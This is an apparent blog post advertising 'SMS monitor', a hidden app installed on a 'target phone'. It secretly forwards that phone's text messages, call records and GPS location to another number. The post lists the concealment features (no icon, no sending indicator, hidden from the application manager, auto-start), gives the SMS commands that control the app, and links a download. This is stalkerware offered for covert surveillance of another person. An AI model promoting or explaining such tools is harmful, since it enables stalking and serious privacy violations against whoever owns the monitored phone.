SMS monitor

I will share applications for monitoring sms from your mobile phone.This application is called SMS monitor.SMS monitor will forward incoming and outgoing SMS from another phone.SMS Monitor runs automatically when the phone is switched on.In addition,SMS monitor running in the background so there's no menu on the target phone and do not have the icon to display.To control the target phone, you must send an SMS command to the target phone sms from another phone.First you have to do to install the sms to the target cell phones,then send commands to the target phone.Command is set (space) admin (space) the target phone number.To turn off send sms: OFF To turn on send sms: ON.If successful you will receive reports:sms in and out, call out,location of the target phone (if it has GPS).
For more details, here are some features of SMS monitor :
* Forward and record incoming and outgoing SMS messages to the phone number you have specified.
* Forward and the Number entry and exit to the phone number you have specified.
* Work in the background, there are no menus or icons.
* Sending sms indicator is not displayed.
* Start automatically when the phone is alive.
* Hidden from the Application manager.
➢Download SMS monitor


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